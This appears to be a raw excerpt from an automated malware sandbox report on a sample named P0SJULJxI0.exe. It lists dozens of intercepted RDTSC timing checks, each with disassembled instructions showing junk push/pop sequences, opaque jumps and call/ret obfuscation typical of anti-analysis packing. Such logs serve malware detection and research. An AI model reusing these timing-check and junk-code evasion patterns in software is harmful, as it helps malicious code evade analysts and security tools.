                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7301A second address: D73020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B540 second address: D7B560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B560 second address: D7B583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C92h 0x00000009 jng 00007FA944C70C86h 0x0000000f ja 00007FA944C70C86h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B583 second address: D7B59B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA944B213F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7AC8D second address: D7AC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7AC91 second address: D7ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA944B213F2h 0x00000010 pop ebx 0x00000011 jnp 00007FA944B213FEh 0x00000017 jno 00007FA944B213EAh 0x0000001d push edx 0x0000001e js 00007FA944B213E6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86148 second address: D8614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867EB second address: D867F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867F6 second address: D867FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867FA second address: D86807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86A86 second address: D86A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86A8A second address: D86AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA944B213FFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86AAF second address: D86AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C5EF second address: D8C5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B0DB second address: D8B0EA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA944C70C86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B5D5 second address: D8B5EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FA944B213EEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B8CC second address: D8B8E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA944C70C91h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B8E9 second address: D8B908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnl 00007FA944B213E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BBCB second address: D8BC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA944C70C96h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FA944C70C8Ah 0x00000017 jnc 00007FA944C70C8Eh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BC05 second address: D8BC0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BD75 second address: D8BD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BD90 second address: D8BDA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007FA944B213E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BDA6 second address: D8BDB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA944C70C86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C026 second address: D8C049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EAh 0x00000007 jns 00007FA944B213EEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C049 second address: D8C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C04E second address: D8C05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FA944B213E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8C44A second address: D8C46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA944C70C86h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8C46A second address: D8C46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8C46E second address: D8C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8AC74 second address: D8AC7E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA944B213ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8AC7E second address: D8AC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D8AC85 second address: D8ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FA944B213E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FA944B213EEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D96B39 second address: D96B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D96B3E second address: D96B76 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA944B213FDh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA944B213F5h 0x0000000f pushad 0x00000010 jng 00007FA944B213E6h 0x00000016 jmp 00007FA944B213EEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5D4AB second address: D5D528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FA944C70C99h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA944C70C88h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D20FFh], edi 0x0000002c mov cx, dx 0x0000002f mov ecx, 0F8D13F1h 0x00000034 lea eax, dword ptr [ebp+12488230h] 0x0000003a sbb dx, F51Dh 0x0000003f mov dword ptr [ebp+122D1CFAh], ecx 0x00000045 nop 0x00000046 pushad 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a jnl 00007FA944C70C86h 0x00000050 popad 0x00000051 jng 00007FA944C70C8Ch 0x00000057 popad 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5D528 second address: D5D52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5D5BA second address: D5D5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5D5C0 second address: D5D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5D97E second address: D5D984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5DC25 second address: D5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5DC2B second address: D5DC4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA944C70C88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA944C70C93h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5DC4D second address: D5DC52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5DC52 second address: D5DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a adc edx, 1E5C8685h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA944C70C88h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5DEE1 second address: D5DF2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA944B213E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2916h] 0x00000028 add dword ptr [ebp+12464306h], esi 0x0000002e push 00000004h 0x00000030 jg 00007FA944B213ECh 0x00000036 nop 0x00000037 je 00007FA944B213F0h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E21F second address: D5E224 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E4CA second address: D5E51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA944B213EDh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007FA944B213F7h 0x00000013 push esi 0x00000014 jmp 00007FA944B213F1h 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA944B213EEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E620 second address: D5E62A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E62A second address: D5E687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA944B213E8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+12488230h] 0x0000002c mov ch, dh 0x0000002e push eax 0x0000002f jng 00007FA944B2140Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA944B213F9h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E687 second address: D5E68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D5E68B second address: D3DEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call dword ptr [ebp+122D20F8h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FA944B213EEh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D3DEBF second address: D3DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D96E3B second address: D96E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 ja 00007FA944B213E8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA944B213F4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D96E60 second address: D96E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D97247 second address: D9724B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9724B second address: D97257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9D20D second address: D9D23E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jnl 00007FA944B213E6h 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FA944B213E6h 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9D23E second address: D9D244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C0E3 second address: D9C10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FA944B213E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C2BC second address: D9C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA944C70C86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C565 second address: D9C569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C569 second address: D9C58D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA944C70C86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA944C70C8Fh 0x00000012 jg 00007FA944C70C8Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C6C0 second address: D9C6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C6C4 second address: D9C6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9C961 second address: D9C9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA944B213E6h 0x0000000a jmp 00007FA944B213EEh 0x0000000f jmp 00007FA944B213F4h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA944B213F8h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9CF65 second address: D9CF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: D9CF71 second address: D9CF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA0D41 second address: DA0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA944C70C86h 0x0000000a jnl 00007FA944C70C86h 0x00000010 popad 0x00000011 push ecx 0x00000012 jne 00007FA944C70C86h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA0D5B second address: DA0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jmp 00007FA944B213F2h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA0D76 second address: DA0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA0D87 second address: DA0D8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA30A5 second address: DA30AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA30AF second address: DA30DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FA944B213E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FA944B2141Eh 0x00000014 jmp 00007FA944B213F7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA30DE second address: DA30E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA846F second address: DA848A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA848A second address: DA84A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA944C70CA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jbe 00007FA944C70C86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DA935E second address: DA9362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DAC539 second address: DAC53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DAC53F second address: DAC543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DAC543 second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DABCCC second address: DABCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DABFA2 second address: DABFAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA944C70C86h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DAC2B8 second address: DAC2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB10DD second address: DB10F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C94h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB037E second address: DB0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB04F6 second address: DB0505 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C86h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0A59 second address: DB0A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
